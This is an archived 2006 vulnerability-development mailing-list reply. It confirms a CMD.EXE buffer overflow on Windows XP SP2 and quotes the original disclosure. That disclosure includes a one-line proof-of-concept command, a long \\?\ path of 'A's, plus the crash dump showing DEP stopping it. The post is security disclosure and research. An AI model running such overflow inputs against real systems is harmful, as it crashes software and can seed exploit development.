Vulnerability Development: Re: Windows Command Processor CMD.EXE Buffer Overflow

Re: Windows Command Processor CMD.EXE Buffer Overflow

From: Bernardo Wernesback <bernardosw_at_gmail.com>
Date: Mon, 23 Oct 2006 13:35:48 -0300

Reproduced the problem on Windows XP SP2 + All Patches English Version.

EventType : BEX P1 : cmd.exe P2 : 5.1.2600.2180 P3 : 41107ebe
P4 : unknown P5 : 0.0.0.0 P6 : 00000000 P7 : 00410041
P8 : c0000005 P9 : 00000008

DEP went into action and generated a dump to be sent to Microsoft for cmd.exe.

On 10/19/06, gregory_panakkal <gregory_panakkal_at_fastmail.fm> wrote:
>
> Windows Command Processor CMD.EXE Buffer Overflow
> Tested on WinXP SP2
> Impact - Very Low
>
>
> Copy-paste the following line in cmd.exe and execute it.
> (It is a single command that has been split into multiple lines for
> readability's sake.)
>
> %COMSPEC% /K "dir
> \\?\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
>
> (260 characters of 'A's)
>
> DEP Comes into the picture.
>
> URL :
> http://www.infogreg.com/security/misc/windows-command-processor-cmd.exe-buffer-overflow.html
>
> regards,
> Gregory Panakkal
> www.infogreg.com
> --
> gregory_panakkal
> gregory_panakkal_at_fastmail.fm
Received on Oct 23 2006
